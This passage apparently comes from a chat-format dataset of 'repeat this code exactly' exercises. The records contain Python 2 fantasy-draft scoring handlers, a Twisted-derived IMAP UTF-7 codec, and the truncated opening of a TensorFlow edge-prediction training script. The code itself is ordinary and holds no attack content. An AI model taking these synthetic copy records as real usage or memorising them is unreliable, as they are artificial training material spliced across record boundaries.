overlapping\n draft_history = db_session.query(DraftHistory).join(Character).filter(\n Character.id == character.id,\n DraftHistory.drafted_at < (episode.aired_at - timedelta(hours=4)),\n (or_(DraftHistory.released_at == None, DraftHistory.released_at > episode.aired_at))\n ).first()\n\n # If we found a draft, populate the score with the relevant user information\n if draft_history:\n user = draft_history.user\n user_id = user.id\n draft_id = draft_history.id\n # if we don't find a draft, still create the score, but don't associate it with a \n # user this gives us a sense of the \"points on the table\" that were left because \n # nobody had that character drafted at the time.\n else:\n user_id = None\n draft_id = None\n\n # specify the description, but apply points from the rubric\n # this depends on the assumption that the rubric doesn't change once the\n # game is in motion. If the rubric changes\n rubric_description = msg['rubric_description']\n rubric = db_session.query(Rubric).filter(Rubric.description == rubric_description).first()\n if not rubric:\n db_session.execute(Rubric.__table__.insert(), [{\"description\": rubric_description, \"points\": msg['points'] or 0, \"canon\": \"altfacts\"}])\n rubric = db_session.query(Rubric).filter(Rubric.description == rubric_description).first()\n # bonus can be applied if specified. If there is no bonus, make it 0 for easier summing\n bonus = int(msg['bonus'] or 0)\n\n # notes are to explain why specifically they got this.\n notes = msg['notes']\n \n score_config = {\n \"character_id\": character.id,\n \"draft_id\": draft_id,\n \"user_id\": user_id,\n \"episode_number\": episode.number,\n \"rubric_id\": rubric.id,\n \"points\": rubric.points,\n \"bonus\": bonus,\n \"notes\": notes,\n }\n db_session.execute(Score.__table__.insert(), score_config)\n db_session.commit()\n\ndef update_user(msg, db_session):\n data = {\n \"name\": msg[\"data\"][\"username\"],\n \"seat_of_power\": msg[\"data\"][\"seat_of_power\"],\n \"house_words\": msg[\"data\"][\"house_words\"],\n }\n print data\n try:\n db_session.query(User).filter(User.name == data['name']).update(data)\n db_session.commit()\n # return {\n # \"notify\": \"User %s updated\" % data[\"name\"],\n # \"user_data\": {\"username\": data['name'], \"seat_of_power\": data['seat_of_power'], \"house_words\": data['house_words']},\n # }\n except exc.InternalError, exception:\n reason = exception.message\n print \"Failed because: %s\" % reason\n db_session.rollback()\n return {\"notify\": \"User %s failed to update because %s\" % (data[\"name\"], reason)}\n except exc.IntegrityError, exception:\n reason = exception.message\n print \"Failed because: %s\" % reason\n db_session.rollback()\n return {\"notify\": \"User %s failed to update because %s\" % (data[\"name\"], reason)}\n```<|memory_end|>\nRepeat it exactly.",
"role": "user"
}
] |
```python
import json
from models import Character, User, Draft, DraftTicket, Episode, DraftHistory, Rubric, Score
from sqlalchemy import or_, exc
from sqlalchemy.orm import lazyload
from datetime import timedelta, datetime
import pandas as pd
import numpy as np
def handle_event(msg_type, msg, db_session=None):
print("handling %s" % msg_type)
handlers = {
"DRAFT": draft,
"RELEASE": release,
"UPDATE_USER": update_user,
}
print "msg_type: %s" % msg
if msg_type in handlers.keys():
response = handlers[msg_type](msg, db_session)
else:
response = {"error": "no handler implemented for %s" % msg_type}
return response
def initial_data(user_identifier, db_session):
rubric = format_rubric(db_session)
characters = format_characters(db_session)
scores = format_scores(db_session)
owners = format_owners(db_session)
user_data = format_user_data(user_identifier, db_session)
can_draft = format_can_draft(user_identifier,db_session)
can_release = format_can_release(user_identifier,db_session)
return [rubric, characters, scores, owners, can_draft, user_data]
def format_owners(db_session):
result = db_session.query(User).order_by(User.name).values(User.name)
owners = [{"username": user[0]} for user in result]
return {"type": "OWNERS", "owners": owners}
# The full list of characters
def format_rubric(db_session):
rubric = {}
result = db_session.query(Rubric).order_by(Rubric.kind, Rubric.points).values(Rubric.description, Rubric.kind, Rubric.points, Rubric.canon)
for row in result:
description, kind, points, canon = row
if not kind in rubric.keys():
rubric[kind] = []
rubric[kind].append({"description":description, "points":points, "kind": canon})
return {"type": "RUBRIC", "rubric": [{"title": title, "data": data} for title, data in rubric.items()]}
def format_characters(db_session):
result = db_session.query(Character).outerjoin(Draft).outerjoin(User).order_by(Character.name).values(Character.id, Character.name, Character.description, User.name)
return {"type": "CHARACTERS", "characters": [{"id": item[0], "name": item[1], "description": item[2], "user": item[3]} for item in result if item[0]]}
# user details for the front end display
def format_user_data(user_identifier, db_session):
print "selecting user for user identifier: %s" % (user_identifier)
user = db_session.query(User).filter(User.identifier == user_identifier).first()
return {"type": "USER_DATA", "user_data": {"email": user.email, "username": user.name, "seat_of_power": user.seat_of_power, "house_words": user.house_words}}
def format_scores(db_session):
query = db_session.query(Score).outerjoin(Character).options(lazyload('rubric'))
raw_report = query.order_by(Score.episode_number, Character.name).all()
scores = [{
"id": score.id,
"episode_number": score.episode_number,
"owner": score.user.name if score.user else "",
"notes": score.notes,
"points": score.points,
"bonus": score.bonus,
"score": score.points + (score.bonus or 0),
"kind": score.rubric.kind,
"canon": score.rubric.canon,
"description": score.rubric.description,
"character_name": score.character.name,
} for score in raw_report]
return {"type":"SCORES", "scores": scores}
# action to draft character from available characters
def draft(data, db_session):
user_identifier = data["data"]["user_identifier"]
character_id = data["data"]["character_id"]
user = db_session.query(User).filter(User.identifier == user_identifier).first()
if not user:
raise Exception("No user found with identifier %s" % user_identifier)
if not user.can_draft(db_session):
return {"can_draft": False}
draft_ticket = user.next_draft_ticket(db_session)
if draft_ticket:
if not draft_ticket.user_identifier == user_identifier:
raise Exception("It is not %s's turn to draft" % user_identifier)
character = db_session.query(Character).outerjoin(Draft).filter(Draft.id == None).filter(Character.id == character_id).first()
result = "Drafting %s for %s" % (character, user_identifier)
user.draft(character)
draft_history = {
"character_id": character.id,
"user_id": user.id
}
db_session.execute(DraftHistory.__table__.insert(), draft_history)
if draft_ticket:
db_session.delete(draft_ticket)
db_session.commit()
db_session.query(Character).outerjoin(Draft).filter(Draft.id == None).values(Character.id, Character.name)
return "%s drafted %s" % (user.name, character.name)
# action to release a character from the draft for this user_identifier
def release(data, db_session):
user_identifier = data["data"]["user_identifier"]
character_id = data["data"]["character_id"]
user = db_session.query(User).filter(User.identifier == user_identifier).first()
if not user:
raise Exception("No user found with identifier %s" % user_identifier)
character = db_session.query(Character).filter(Character.id == character_id).first()
user.release(character)
draft_history_ids = db_session.query(User).outerjoin(DraftHistory).outerjoin(Character).filter(User.name==user.name, Character.name==character.name).values(DraftHistory.id)
for draft_history_id in draft_history_ids:
draft_history = db_session.query(DraftHistory).filter(DraftHistory.id == draft_history_id).update({"released_at":datetime.now()})
db_session.commit()
return "%s released %s" % (user.name, character.name)
def format_can_draft(user_identifier, db_session):
user = db_session.query(User).filter(User.identifier == user_identifier).first()
if not user:
raise Exception("No user found with identifier %s" % user_identifier)
return {"type": "CAN_DRAFT", "can_draft": user.can_draft(db_session)}
def format_can_release(user_identifier, db_session):
user = db_session.query(User).filter(User.identifier == user_identifier).first()
if not user:
raise Exception("No user found with identifier %s" % user_identifier)
return {"type": "CAN_RELEASE", "can_release": user.can_release(db_session)}
def generate_score(msg, db_session):
# Get the character from the unique character name
character_name = msg['character_name']
character = db_session.query(Character).filter(Character.name == character_name).first()
if not character:
db_session.execute(Character.__table__.insert(), [{"name": character_name}])
character = db_session.query(Character).filter(Character.name == character_name).first()
# get the episode from the unique episode number
episode_number = msg['episode_number']
episode = db_session.query(Episode).filter(Episode.number == episode_number).first()
# get a draft from the draft history. This is a historically idempotent approach
# ideally we should be able to clear and regenerate the scores at any time based on the draft history data. This depends upon the assumption that no drafts can be overlapping
draft_history = db_session.query(DraftHistory).join(Character).filter(
Character.id == character.id,
DraftHistory.drafted_at < (episode.aired_at - timedelta(hours=4)),
(or_(DraftHistory.released_at == None, DraftHistory.released_at > episode.aired_at))
).first()
# If we found a draft, populate the score with the relevant user information
if draft_history:
user = draft_history.user
user_id = user.id
draft_id = draft_history.id
# if we don't find a draft, still create the score, but don't associate it with a
# user this gives us a sense of the "points on the table" that were left because
# nobody had that character drafted at the time.
else:
user_id = None
draft_id = None
# specify the description, but apply points from the rubric
# this depends on the assumption that the rubric doesn't change once the
# game is in motion. If the rubric changes
rubric_description = msg['rubric_description']
rubric = db_session.query(Rubric).filter(Rubric.description == rubric_description).first()
if not rubric:
db_session.execute(Rubric.__table__.insert(), [{"description": rubric_description, "points": msg['points'] or 0, "canon": "altfacts"}])
rubric = db_session.query(Rubric).filter(Rubric.description == rubric_description).first()
# bonus can be applied if specified. If there is no bonus, make it 0 for easier summing
bonus = int(msg['bonus'] or 0)
# notes are to explain why specifically they got this.
notes = msg['notes']
score_config = {
"character_id": character.id,
"draft_id": draft_id,
"user_id": user_id,
"episode_number": episode.number,
"rubric_id": rubric.id,
"points": rubric.points,
"bonus": bonus,
"notes": notes,
}
db_session.execute(Score.__table__.insert(), score_config)
db_session.commit()
def update_user(msg, db_session):
data = {
"name": msg["data"]["username"],
"seat_of_power": msg["data"]["seat_of_power"],
"house_words": msg["data"]["house_words"],
}
print data
try:
db_session.query(User).filter(User.name == data['name']).update(data)
db_session.commit()
# return {
# "notify": "User %s updated" % data["name"],
# "user_data": {"username": data['name'], "seat_of_power": data['seat_of_power'], "house_words": data['house_words']},
# }
except exc.InternalError, exception:
reason = exception.message
print "Failed because: %s" % reason
db_session.rollback()
return {"notify": "User %s failed to update because %s" % (data["name"], reason)}
except exc.IntegrityError, exception:
reason = exception.message
print "Failed because: %s" % reason
db_session.rollback()
return {"notify": "User %s failed to update because %s" % (data["name"], reason)}
```
|
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n```python\n# The contents of this file has been derived code from the Twisted project\n# (http://twistedmatrix.com/). The original author is Jp Calderone.\n\n# Twisted project license follows:\n\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\ntext_type = unicode\nbinary_type = str\n\nPRINTABLE = set(range(0x20, 0x26)) | set(range(0x27, 0x7f))\n\ndef encode(s):\n \"\"\"Encode a folder name using IMAP modified UTF-7 encoding.\n\n Despite the function's name, the output is still a unicode string.\n \"\"\"\n if not isinstance(s, text_type):\n return s\n\n r = []\n _in = []\n\n def extend_result_if_chars_buffered():\n if _in:\n r.extend(['&', modified_utf7(''.join(_in)), '-'])\n del _in[:]\n\n for c in s:\n if ord(c) in PRINTABLE:\n extend_result_if_chars_buffered()\n r.append(c)\n elif c == '&':\n extend_result_if_chars_buffered()\n r.append('&-')\n else:\n _in.append(c)\n\n extend_result_if_chars_buffered()\n\n return ''.join(r)\n\ndef decode(s):\n \"\"\"Decode a folder name from IMAP modified UTF-7 encoding to unicode.\n\n Despite the function's name, the input may still be a unicode\n string. If the input is bytes, it's first decoded to unicode.\n \"\"\"\n if isinstance(s, binary_type):\n s = s.decode('latin-1')\n if not isinstance(s, text_type):\n return s\n\n r = []\n _in = []\n for c in s:\n if c == '&' and not _in:\n _in.append('&')\n elif c == '-' and _in:\n if len(_in) == 1:\n r.append('&')\n else:\n r.append(modified_deutf7(''.join(_in[1:])))\n _in = []\n elif _in:\n _in.append(c)\n else:\n r.append(c)\n if _in:\n r.append(modified_deutf7(''.join(_in[1:])))\n\n return ''.join(r)\n\ndef modified_utf7(s):\n # encode to utf-7: '\\xff' => b'+AP8-', decode from latin-1 => '+AP8-'\n s_utf7 = s.encode('utf-7').decode('latin-1')\n return s_utf7[1:-1].replace('/', ',')\n\ndef modified_deutf7(s):\n s_utf7 = '+' + s.replace(',', '/') + '-'\n # encode to latin-1: '+AP8-' => b'+AP8-', decode from utf-7 => '\\xff'\n return s_utf7.encode('latin-1').decode('utf-7')\n```",
"role": "user"
}
] |
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n<|memory_start|>```python\n# The contents of this file has been derived code from the Twisted project\n# (http://twistedmatrix.com/). The original author is Jp Calderone.\n\n# Twisted project license follows:\n\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\ntext_type = unicode\nbinary_type = str\n\nPRINTABLE = set(range(0x20, 0x26)) | set(range(0x27, 0x7f))\n\ndef encode(s):\n \"\"\"Encode a folder name using IMAP modified UTF-7 encoding.\n\n Despite the function's name, the output is still a unicode string.\n \"\"\"\n if not isinstance(s, text_type):\n return s\n\n r = []\n _in = []\n\n def extend_result_if_chars_buffered():\n if _in:\n r.extend(['&', modified_utf7(''.join(_in)), '-'])\n del _in[:]\n\n for c in s:\n if ord(c) in PRINTABLE:\n extend_result_if_chars_buffered()\n r.append(c)\n elif c == '&':\n extend_result_if_chars_buffered()\n r.append('&-')\n else:\n _in.append(c)\n\n extend_result_if_chars_buffered()\n\n return ''.join(r)\n\ndef decode(s):\n \"\"\"Decode a folder name from IMAP modified UTF-7 encoding to unicode.\n\n Despite the function's name, the input may still be a unicode\n string. If the input is bytes, it's first decoded to unicode.\n \"\"\"\n if isinstance(s, binary_type):\n s = s.decode('latin-1')\n if not isinstance(s, text_type):\n return s\n\n r = []\n _in = []\n for c in s:\n if c == '&' and not _in:\n _in.append('&')\n elif c == '-' and _in:\n if len(_in) == 1:\n r.append('&')\n else:\n r.append(modified_deutf7(''.join(_in[1:])))\n _in = []\n elif _in:\n _in.append(c)\n else:\n r.append(c)\n if _in:\n r.append(modified_deutf7(''.join(_in[1:])))\n\n return ''.join(r)\n\ndef modified_utf7(s):\n # encode to utf-7: '\\xff' => b'+AP8-', decode from latin-1 => '+AP8-'\n s_utf7 = s.encode('utf-7').decode('latin-1')\n return s_utf7[1:-1].replace('/', ',')\n\ndef modified_deutf7(s):\n s_utf7 = '+' + s.replace(',', '/') + '-'\n # encode to latin-1: '+AP8-' => b'+AP8-', decode from utf-7 => '\\xff'\n return s_utf7.encode('latin-1').decode('utf-7')\n```<|memory_end|>",
"role": "user"
}
] |
```python
# The contents of this file has been derived code from the Twisted project
# (http://twistedmatrix.com/). The original author is Jp Calderone.
# Twisted project license follows:
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
text_type = unicode
binary_type = str
PRINTABLE = set(range(0x20, 0x26)) | set(range(0x27, 0x7f))
def encode(s):
"""Encode a folder name using IMAP modified UTF-7 encoding.
Despite the function's name, the output is still a unicode string.
"""
if not isinstance(s, text_type):
return s
r = []
_in = []
def extend_result_if_chars_buffered():
if _in:
r.extend(['&', modified_utf7(''.join(_in)), '-'])
del _in[:]
for c in s:
if ord(c) in PRINTABLE:
extend_result_if_chars_buffered()
r.append(c)
elif c == '&':
extend_result_if_chars_buffered()
r.append('&-')
else:
_in.append(c)
extend_result_if_chars_buffered()
return ''.join(r)
def decode(s):
"""Decode a folder name from IMAP modified UTF-7 encoding to unicode.
Despite the function's name, the input may still be a unicode
string. If the input is bytes, it's first decoded to unicode.
"""
if isinstance(s, binary_type):
s = s.decode('latin-1')
if not isinstance(s, text_type):
return s
r = []
_in = []
for c in s:
if c == '&' and not _in:
_in.append('&')
elif c == '-' and _in:
if len(_in) == 1:
r.append('&')
else:
r.append(modified_deutf7(''.join(_in[1:])))
_in = []
elif _in:
_in.append(c)
else:
r.append(c)
if _in:
r.append(modified_deutf7(''.join(_in[1:])))
return ''.join(r)
def modified_utf7(s):
# encode to utf-7: '\xff' => b'+AP8-', decode from latin-1 => '+AP8-'
s_utf7 = s.encode('utf-7').decode('latin-1')
return s_utf7[1:-1].replace('/', ',')
def modified_deutf7(s):
s_utf7 = '+' + s.replace(',', '/') + '-'
# encode to latin-1: '+AP8-' => b'+AP8-', decode from utf-7 => '\xff'
return s_utf7.encode('latin-1').decode('utf-7')
```
|
[
{
"content": "```python\n# Copyright 2016 The TensorFlow Authors All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\nfrom tensorflow.examples.tutorials.mnist.mnist import loss\n\n\"\"\"Code for training the prediction model.\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.python.platform import app\nfrom tensorflow.python.platform import flags\n\nfrom prediction_input_flo_edge import build_tfrecord_input, DATA_DIR\nfrom prediction_input_flo_eval import build_tfrecord_input_eval\nfrom prediction_model_flo_edge import construct_model\nfrom visualize import plot_flo, plot_eval, plot_flo_edge\nfrom optical_flow_warp import transformer\n\nimport os\n\n# How often to record tensorboard summaries.\nSUMMARY_INTERVAL = 40\n\n# How often to run a batch through the validation model.\nVAL_INTERVAL = 200\n\n# How often to save a model checkpoint\nSAVE_INTERVAL = 500\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('data_dir', DATA_DIR, 'directory containing data.')\nflags.DEFINE_string('output_dir', \"\", 'directory for model checkpoints.')\nflags.DEFINE_integer('num_iterations', 100000, 'number of training iterations.')\nflags.DEFINE_string('pretrained_model', '',\n 'filepath of a pretrained model to initialize from.')\n\nflags.DEFINE_float('train_val_split', 1.0,\n 'The percentage of files to use for the training set,'\n ' vs. the validation set.')\n\nflags.DEFINE_integer('batch_size', 32, 'batch size for training')\nflags.DEFINE_float('learning_rate', 0.001,\n 'the base learning rate of the generator')\nflags.DEFINE_integer('num_gpus', 1,\n 'the number of gpu to use')\n\n\ndef get_black_list(clses):\n blacklist = []\n for cls in clses:\n fname = \"/home/wangyang59/Data/ILSVRC2016/ImageSets/VID/train_%s.txt\" % cls\n with open(fname) as f:\n content = f.readlines()\n blacklist += [x.split(\" \")[0].split(\"/\")[-1] + \".tfrecord\" for x in content]\n return blacklist\n\n## Helper functions\ndef peak_signal_to_noise_ratio(true, pred):\n \"\"\"Image quality metric based on maximal signal power vs. power of the noise.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n peak signal to noise ratio (PSNR)\n \"\"\"\n return 10.0 * tf.log(1.0 / mean_squared_error(true, pred)) / tf.log(10.0)\n\n\ndef mean_squared_error(true, pred):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n return tf.reduce_sum(tf.square(true - pred)) / tf.to_float(tf.size(pred))\n\ndef weighted_mean_squared_error(true, pred, weight):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n \n tmp = tf.reduce_sum(weight*tf.square(true-pred), axis=[1,2], keep_dims=True) / tf.reduce_sum(weight, axis=[1, 2], keep_dims=True)\n return tf.reduce_mean(tmp)\n #return tf.reduce_sum(tf.square(true - pred)*weight) / tf.to_float(tf.size(pred))\n #return tf.reduce_sum(tf.square(true - pred)*weight) / tf.reduce_sum(weight)\n\ndef mean_L1_error(true, pred):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n return tf.reduce_sum(tf.abs(true - pred)) / tf.to_float(tf.size(pred))\n\ndef weighted_mean_L1_error(true, pred, weight):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n return tf.reduce_sum(tf.abs(true - pred)*weight) / tf.to_float(tf.size(pred))\n\ndef huber_error(true, pred, delta=0.05):\n err = true - pred \n herr = tf.where(tf.abs(err)<delta, 0.5*tf.square(err), delta*(tf.abs(err) - 0.5*delta)) # condition, true, false\n return tf.reduce_sum(herr) / tf.to_float(tf.size(pred))\n\ndef cal_grad_error_wmask(image, mask, kernels):\n \"\"\"Calculate the gradient of the given image by calculate the difference between nearby pixels\n \"\"\"\n error = 0.0\n img_height, img_width, color_channels = map(int, image.get_shape()[1:4])\n \n cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]\n cropped_mask = mask[:, 1:(img_height-1), 1:(img_width-1), :]\n for kernel in kernels:\n shifted_image = tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n error += weighted_mean_squared_error(cropped_image, shifted_image[:, 1:(img_height-1), 1:(img_width-1), :], cropped_mask)\n \n return error / len(kernels)\n \ndef cal_grad_error(image, kernels):\n \"\"\"Calculate the gradient of the given image by calculate the difference between nearby pixels\n \"\"\"\n error = 0.0\n img_height, img_width, color_channels = map(int, image.get_shape()[1:4])\n cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]\n for kernel in kernels:\n shifted_image = tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n error += mean_L1_error(cropped_image, shifted_image[:, 1:(img_height-1), 1:(img_width-1), :])\n \n return error / len(kernels)\n\ndef cal_weighted_var(image, mask):\n \n weighted_mean = tf.reduce_sum(image*mask, axis=[1, 2], keep_dims=True) / tf.reduce_sum(mask, axis=[1, 2], keep_dims=True)\n #mean = tf.reduce_mean(image, axis=[1, 2], keep_dims=True)\n weighted_var = (tf.reduce_sum(mask*tf.square(image - weighted_mean), axis=[1,2], keep_dims=True) + 0.0) / tf.reduce_sum(mask, axis=[1, 2], keep_dims=True)\n \n return tf.reduce_mean(weighted_var)\n \ndef cal_weighted_edge_diff(image, mask, kernels, scale=1.0):\n error = 0.0\n img_height, img_width, color_channels = map(int, image.get_shape()[1:4])\n cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]\n cropped_mask = mask[:, 1:(img_height-1), 1:(img_width-1), :]\n \n for kernel in kernels:\n shifted_image = (tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME'))[:, 1:(img_height-1), 1:(img_width-1), :]\n shifted_mask = (tf.nn.depthwise_conv2d(mask, tf.tile(kernel, [1, 1, 1, 1]), \n [1, 1, 1, 1], 'SAME'))[:, 1:(img_height-1), 1:(img_width-1), :]\n \n tmp = tf.exp(-tf.reduce_sum(tf.square(shifted_image-cropped_image), axis=[3], keep_dims=True) / scale) * tf.square(shifted_mask-cropped_mask)\n \n error += tf.reduce_sum(tmp) / tf.to_float(tf.size(shifted_mask))\n \n return error / len(kernels)\n\ndef create_flo_edge(flo, kernels):\n batch_size, img_height, img_width, color_channels = map(int, flo.get_shape()[0:4])\n \n flo_shift_v = tf.nn.depthwise_conv2d(flo, tf.tile(kernels[0], [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n flo_shift_h = tf.nn.depthwise_conv2d(flo, tf.tile(kernels[1], [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n \n pos = tf.constant(1.0, shape=[batch_size, img_height, img_width, 1])\n neg = tf.constant(0.0, shape=[batch_size, img_height, img_width, 1])\n \n true_edge = tf.where(tf.reduce_max(tf.concat([tf.abs(flo-flo_shift_h), tf.abs(flo-flo_shift_v)], axis=[3]), \n axis=[3], keep_dims=True)>0.5, \n x=pos, y=neg)\n \n# true_edge_h = tf.where(tf.reduce_max(tf.abs(flo-flo_shift_h), axis=[3], keep_dims=True)>0.3, x=pos, y=neg)\n# true_edge_v = tf.where(tf.reduce_max(tf.abs(flo-flo_shift_v), axis=[3], keep_dims=True)>0.3, x=pos, y=neg)\n \n return true_edge\n\ndef average_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n\n Note that this function provides a synchronization point across all towers.\n\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n average_grads.append(grad_and_var)\n return average_grads\n\nclass Model(object):\n\n def __init__(self,\n image1=None,\n flo=None,\n true_edge=None,\n reuse_scope=False,\n scope=None,\n prefix=\"train\"):\n\n #self.prefix = prefix = tf.placeholder(tf.string, [])\n self.iter_num = tf.placeholder(tf.float32, [])\n summaries = []\n \n self.kernels = []\n for i in xrange(4):\n kernel = np.zeros((3 * 3), dtype=np.float32)\n kernel[i*2 + 1] = 1.0\n kernel = kernel.reshape((3, 3, 1, 1))\n kernel = tf.constant(kernel, shape=(3, 3, 1, 1), \n name='kernel_shift'+str(i), verify_shape=True)\n self.kernels.append(kernel)\n \n if not reuse_scope:\n edge_mask = construct_model(image1)\n else: # If it's a validation or test model.\n with tf.variable_scope(scope, reuse=True):\n edge_mask = construct_model(image1)\n \n #flo_mag = tf.sqrt(tf.square(flo[:,:,:,0:1]) + tf.square(flo[:,:,:,1:2]))\n# true_edge_h, true_edge_v, true_edge = create_flo_edge(flo, self.kernels)\n \n loss = -tf.reduce_mean(true_edge*tf.log(edge_mask+1e-10) + (1.0-true_edge)*tf.log(1.0-edge_mask+1e-10))\n #loss_v = -tf.reduce_mean(true_edge_v*tf.log(edge_mask_v+1e-10) + (1.0-true_edge_v)*tf.log(1.0-edge_mask_v+1e-10))\n \n self.loss = loss\n self.orig_image1 = image1\n self.flo = flo\n self.true_edge = true_edge\n self.pred_edge = edge_mask\n \n summaries.append(tf.summary.scalar(prefix + '_loss', self.loss))\n \n self.summ_op = tf.summary.merge(summaries)\n \nclass Model_eval(object):\n\n def __init__(self,\n image=None,\n mask=None,\n scope=None):\n\n #self.prefix = prefix = tf.placeholder(tf.string, [])\n self.iter_num = tf.placeholder(tf.float32, [])\n summaries = []\n \n self.kernels = []\n for i in xrange(4):\n kernel = np.zeros((3 * 3), dtype=np.float32)\n kernel[i*2 + 1] = 1.0\n kernel = kernel.reshape((3, 3, 1, 1))\n kernel = tf.constant(kernel, shape=(3, 3, 1, 1), \n name='kernel_shift'+str(i), verify_shape=True)\n self.kernels.append(kernel)\n \n batch_size, img_height, img_width = map(int, image.get_shape()[0:3])\n \n with tf.variable_scope(scope, reuse=True):\n edge_mask_h = construct_model(image)\n \n #self.summ_op = tf.summary.merge(summaries)\n self.image = image\n self.mask_true = mask\n self.pred_edge_h = edge_mask_h\n \ndef main(unused_argv):\n if FLAGS.output_dir == \"\":\n raise Exception(\"OUT_DIR must be specified\")\n \n if os.path.exists(FLAGS.output_dir):\n raise Exception(\"OUT_DIR already exist\")\n \n print 'Constructing models and inputs.'\n \n with tf.Graph().as_default(), tf.device('/cpu:0'):\n train_op = tf.train.AdamOptimizer(FLAGS.learning_rate)\n \n tower_grads = []\n itr_placeholders = []\n \n image, 